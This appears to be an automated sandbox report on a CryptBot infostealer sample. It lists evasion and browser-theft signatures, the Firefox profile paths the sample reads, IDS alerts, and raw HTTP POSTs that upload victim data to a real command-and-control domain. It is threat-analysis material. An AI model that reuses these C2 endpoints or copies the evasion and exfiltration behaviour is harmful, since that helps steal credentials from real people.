Windows Analysis Report
8kl5nJ3f9x.exe

Overview

General Information

Sample name: 8kl5nJ3f9x.exe
renamed because original name is a hash value
Original sample name: cf2e7aee1603394f639799bab432a541.exe
Analysis ID: 1580286
MD5: cf2e7aee1603394f639799bab432a541
SHA1: e04e0cc2be626457d3e8a6fef55733ac1fcfca1e
SHA256: b0c1f7513ed24756353328321ac1b969186b332d02ac88adc421fc719a2dcedd
Tags: exeuser-abuse_ch
Infos:

Detection

Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Cryptbot
AI detected suspicious sample
Drops large PE files
Hides threads from debuggers
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection

barindex
Source: 8kl5nJ3f9x.exe Avira: detected
Source: 8kl5nJ3f9x.exe ReversingLabs: Detection: 60%
Source: 8kl5nJ3f9x.exe Virustotal: Detection: 48% Perma Link
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 8kl5nJ3f9x.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 13_2_000715B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 13_2_000715B0
Source: 8kl5nJ3f9x.exe, 00000000.00000003.2078244100.0000000007C80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_334bb1a3-3
Source: 8kl5nJ3f9x.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\doomed\ Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\ Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 13_2_000781E0
Source: chrome.exe Memory has grown: Private usage: 9MB later: 29MB

Networking

barindex
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49751 -> 185.121.15.192:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49757 -> 185.121.15.192:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49791 -> 185.121.15.192:80
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 504863Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 35 30 32 36 36 30 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global traffic HTTP traffic detected: GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=xI37tTdRdWtbDdx31735026608 HTTP/1.1Host: home.twentytk20ht.topAccept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20ht.topAccept: */*Content-Length: 463Content-Type: multipart/form-data; boundary=------------------------k6NHs8V6QlVxoSD0lfdd3gData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6b 36 4e 48 73 38 56 36 51 6c 56 78 6f 53 44 30 6c 66 64 64 33 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 61 71 6f 78 61 6d 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a c9 59 7a ae a7 b0 8e 6a aa c5 e5 77 e2 f5 54 52 9d 3b fa 27 a5 c7 bf 85 ab 57 24 03 70 08 a6 fa 79 f5 61 4c 94 05 f2 dd 47 e1 8e 83 27 c2 23 9a ab f9 3f 9d 9a 0c 6c ad d9 d3 c1 dc 84 ec 60 e8 e1 8a 49 1e 90 42 8b fd b4 03 3d dd 0d a1 dc fb 48 2a 85 dc ce 97 7c 47 eb 8e 32 82 c9 4b 5c d3 dd 7f e7 60 fb 0d b9 5e 64 15 76 89 04 e5 90 f8 d1 43 ea 20 c2 68 f4 2a 77 23 15 a1 51 c6 32 59 26 53 f0 8c ee 35 d2 26 e4 95 e2 12 d2 bd 13 a9 4a 70 ff ac 3a 3d 11 f9 7e 43 5e 2f 90 13 6f 89 30 b6 58 63 57 c6 08 07 ef 1e 7d 60 21 8b 8f 89 72 b1 7d 79 2d 09 f7 fc e8 eb 9d bf 18 9d c2 2c ba 83 7f ad ea 89 bb 86 97 bf 7c ce f6 85 63 eb 1b ca cb e6 f5 f2 bb 33 01 69 31 6a 91 71 bf e5 7a 9c b8 46 37 75 63 33 89 64 b1 28 10 25 5c 0e 63 28 75 99 60 96 2c 91 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6b 36 4e 48 73 38 56 36 51 6c 56 78 6f 53 44 30 6c 66 64 64 33 67 2d 2d 0d 0a Data Ascii: --------------------------k6NHs8V6QlVxoSD0lfdd3gContent-Disposition: form-data; name="file"; filename="Maqoxam.bin"Content-Type: application/octet-streamYzjwTR;'W$pyaLG'#?l`IB=H*|G2K\`^dvC h*w#Q2Y&S5&Jp:=~C^/o0XcW}`!r}y-,|c3i1jqzF7uc3d(%\c(u`,--------------------------k6NHs8V6QlVxoSD0lfdd3g--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20ht.topAccept: */*Content-Length: 77290Content-Type: multipart/form-data; boundary=------------------------CS0zXdxTKoE7TpANwQ7WX5Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 43 53 30 7a 58 64 78 54 4b 6f 45 37 54 70 41 4e 77 51 37 57 58 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 69 6e 61 78 69 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 56 c1 a9 90 8d 57 bb bd cb 58 5f 19 37 26 f0 14 ab d4 2a 16 78 8f b3 0b c0 af 6d ef 09 c3 23 62 b4 d2 37 f0 31 f3 fa 8f f7 2a 9a 61 15 00 22 18 10 0e 59 53 28 8c 15 fb 52 6e 45 c2 b2 45 b7 cf c4 c3 46 d4 8c 50 a2 2e 05 e9 2b bf 95 4d e3 b8 c4 bb bc 6e 00 ff 8e 2f 39 57 52 a2 05 4c 30 f5 8e e8 c0 ce 08 13 bb 79 78 e6 76 33 4c 2b fb 1b b8 9a d6 73 5c 3a 51 bf 1a 0a 21 0a 30 5e 3b c3 c5 d9 10 aa b8 68 15 d3 bb 91 fd 95 12 ae 1f e7 0c f8 29 87 4c 0e d6 1e ac 9e c2 58 41 26 e5 33 72 ff 8c 6b da fc 00 be 8f 0d ed 59 73 00 e5 70 b3 03 38 f4 e9 93 f5 fb f8 5f d5 0e 11 2b 23 60 15 62 20 b5 02 12 53 08 d0 08 e8 72 13 97 48 7f cb 32 20 f7 52 48 78 14 15 72 af cd 38 35 00 32 e8 86 bd fe 36 3e cc c7 20 cc 8d 0d 75 7c 2d b8 72 aa 40 67 17 40 07 32 3a fd 80 b6 40 07 d2 94 38 63 7a 9e 74 3d 98 09 29 d4 7b 0f f5 19 b8 a5 d1 fd f1 00 8a 77 c8 0d a8 54 a7 fb 22 2f bc ab ca 79 3a 8d 21 bf 79 98 81 19 9e dd 6b 7d 37 2e 16 52 a7 b8 e6 6a 33 91 0f 2b c5 61 78 db 5b c7 f6 34 f8 8c 13 db 74 98 ee e0 d2 31 a9 8f bb e7 bb 23 82 fb 31 5b cb 44 83 0e 06 15 8d db 2b 77 98 c0 4b 8e 64 fe a9 50 13 9b 30 79 42 a7 10 e3 65 3d ee 06 91 ae 77 4c 53 8f 78 6c ab e5 96 6e 7f c2 c2 a3 32 b3 96 3c 9c 0e 88 83 29 12 40 9e 68 be 3c 0e 72 1f 42 f6 fa 8c 59 94 8a 66 dc 60 a5 91 7b cb 43 18 6b 94 5c d9 ad ce ea 6e 1c ae 85 9e a8 83 8c 2e 0c bd 91 d8 67 f8 d9 76 a8 64 8d 53 fa 79 62 87 aa c2 cc 1b f5 35 89 7c 66 70 d6 d8 76 a9 58 78 f4 dd 9d f4 bc bc 25 c0 8a cd d9 ac 45 ed 6c f6 67 a1 b7 28 05 c4 64 b8 a1 69 bd 91 75 de 91 a4 76 8a 05 22 5a b1 25 a5 54 23 96 85 55 71 6b 9f e1 59 d4 20 08 c6 70 f8 05 49 1f 23 88 1b f6 8e 35 29 ae a2 7f fa 01 db 27 5c bc 53 1c 5d 8c ab 49 d5 9a 5c 1c 36 02 73 ce b8 d6 68 8e b0 93 dc 85 c8 e5 0c 2c be 6d bb bb ad bc 24 c9 a7 c3 f2 14 f9 d5 b6 95 15 a4 a9 09 83 19 a7 cd 8d 3b e3 b9 fd bb 1a 2a 1a a7 ea 57 04 30 bf 6a 75 90 4c c3 48 9d f3 36 71 fe 8e 27 e3 58 db d8 2d c0 e0 11 6a fc ce 1d 90 66 41 a3 05 6e bd b5 7a 8f 8d 8d 1d 91 71 ca 7a 76 d1 f8 58 96 ae d5 2f 6e 92 f3 b9 16 c5 17 7f 15 2f 2d f5 5b 32 05 07 f3 8a 5c ba c9 60 32 89 91 34 51 c6 ae c2 c2 e1 c2 5a 64 c0 50 56 77 9f 45 7b c0 77 16 80 94 5f e9 18 98 ad 22 81 f0 ca e9 67 c2 8f a8 dc 20 12 c6 15 21 bd e2 61 77 5f a1 af 22 58 f7 07 6a 9f 2e 1d a2 c1 99 38 87 24 33 f7 f5 45 9d ca a2 89 e2 ee aa df de 61 3f 59 fa c1 3c 58 eb 96 32 31 c2 85 b8 8a
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20ht.topAccept: */*Content-Length: 30335Content-Type: multipart/form-data; boundary=------------------------LpLL1m4NIMbOPWExZjE1NZData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 4c 70 4c 4c 31 6d 34 4e 49 4d 62 4f 50 57 45 78 5a 6a 45 31 4e 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 75 7a 65 74 69 66 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 9a d8 1a 46 6a cf 5f 48 bb d9 6f f7 ad 64 79 b5 80 68 ef 0c b6 09 33 79 58 29 5f 9e dd dd 6e 12 57 e8 d0 af 01 15 39 c2 72 90 c3 13 f6 54 25 a0 a6 1e fa 67 ad 10 56 e8 30 b6 1c 33 15 a5 6d 33 cf d2 4d 51 13 30 0a dd 50 a0 74 41 72 0e 50 2b 84 c5 8a f6 ae 99 8f d2 7a 83 81 bd e6 82 06 18 67 2a c4 e4 99 86 55 21 12 60 af 20 63 77 f9 b7 a5 ba f0 10 d2 b6 03 14 57 e1 9f 04 19 96 b7 6e 8f fe b3 fd de 0f 14 50 25 ec 4c 8d f4 92 85 c7 de da 0a 55 e6 10 37 8d 01 58 d9 0d 2b 52 73 7c ab ca 31 13 6d 7b fc b9 80 20 b3 db 33 46 ba 6a 59 a9 de 30 45 a7 22 3d 43 df 84 e8 44 25 be d6 ec 16 6e 2b 72 b0 f8 47 5a 9d 88 a2 13 36 83 2f 6d aa fa ce 80 89 d0 de b0 9f 50 44 72 48 70 6d 2a 71 cf 1d a8 6d d6 75 ff df 3a 14 42 0d 73 b3 69 48 1f 4a 41 42 56 5a 91 7a cf 4d 09 bc c3 28 df 65 62 37 d0 a9 4b 56 79 82 81 97 03 7e 84 c2 38 8b a3 23 fb 5e 64 8c 8c 92 0f bb 0e fa 60 1a 55 05 6d d6 7e ba 9d 97 a2 a2 81 e5 4f c2 ae 6f e7 31 e6 92 75 2f 8b b4 94 49 fa 17 fd 65 66 52 d8 6a 67 24 b7 b2 10 37 15 45 c3 9d 0a 95 05 d7 25 9b c7 fd 2e 87 6f ce 9a a4 f4 51 30 60 d7 f5 53 eb cf e8 4f e7 5b 2c 5c 67 2b 3a 7e 56 ae 7e 24 7b 8a ad f3 b0 79 8e fe 51 a6 ed b2 8f cf 3e 5a d1 76 ac 75 cd 43 a3 fc 3f 0d 3a fa fa 2d 01 cb fc b5 60 46 c9 f0 52 64 74 47 46 30 6f 31 a4 c3 07 9e 32 45 ba b9 3a 7c 98 ee f8 57 c4 fb 04 42 7b 0b 27 ce 0e 1d b6 23 1a bf fb 7b c8 d2 8b 30 68 30 9a 4c 37 94 f7 28 ff 4f bb 03 30 59 6e e9 0c 14 9e 9d 9b 15 4f ef f0 78 cf 80 1b 84 19 cc 5e 2c e2 9f 80 cf ff d2 d0 df a7 78 d2 f8 e5 60 77 61 80 a2 cc 88 92 80 df 04 ae 4a f0 e0 0c 5e 64 1b 08 de c9 ab 7c 07 da 22 18 a7 ba 82 b7 59 d3 e2 7f 66 94 e2 f8 d1 c8 54 8d 52 c4 ce 16 f5 72 dd 22 50 6a 7b 10 49 2c 20 6b 5d cd 25 d1 df 99 5a d9 6d 87 23 de c1 3e eb 87 2e d6 56 20 d9 4d 2b 03 38 8d 22 50 b3 cd 98 61 ef 66 f5 20 36 94 1b d5 8a d9 95 e2 ec 5b 71 79 d6 e1 b5 8b b9 74 3f 98 d0 cf b2 f0 b7 d1 4f ec 84 ca 27 86 f4 b9 76 b0 13 ad c6 f9 b6 c1 c0 a0 74 f6 b3 af 99 4d b6 7b b2 02 79 76 fe 73 e2 b1 0e aa 6c fa 32 0b 96 6c 04 0e 45 87 71 f5 83 3e 4e 8b 30 39 79 04 13 27 cb 18 d8 da ed 83 5d 7a 29 43 af 7a bd f3 00 fa 82 d5 a3 3a b6 0b 16 a4 06 ce ca 74 73 9f 61 b8 e9 a7 79 58 00 0c e6 be 02 ca 7c fe 64 3d 04 e5 38 3e 48 71 c2 d7 87 44 ea 61 94 65 5d 3e ee 17 e3 8f 3b 77 f6 b4 88 d2 69 d0 1c e6 a1 b3 17 5b 50 d7 d5 b0 5b c6 5f 3b 0e 04 55 c8 ad c9 6c 72 90 b5
Source: global traffic HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 56Data Raw: 7b 20 22 69 64 31 22 3a 20 22 78 49 33 37 74 54 64 52 64 57 74 62 44 64 78 33 31 37 33 35 30 32 36 36 30 38 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 32 22 20 7d Data Ascii: { "id1": "xI37tTdRdWtbDdx31735026608", "data": "Done2" }
Source: Joe Sandbox View IP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox View IP Address: 98.85.100.80 98.85.100.80
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=xI37tTdRdWtbDdx31735026608 HTTP/1.1Host: home.twentytk20ht.topAccept: */*
Source: chrome.exe, 00000003.00000002.2500797513.00001D8C028DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2502935242.00001D8C02D44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: /www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2500797513.00001D8C028DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2502935242.00001D8C02D44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000003.2472430478.00001D8C03114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2472167753.00001D8C025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2472307003.00001D8C03190000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000003.00000003.2472430478.00001D8C03114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2472167753.00001D8C025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2472307003.00001D8C03190000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return 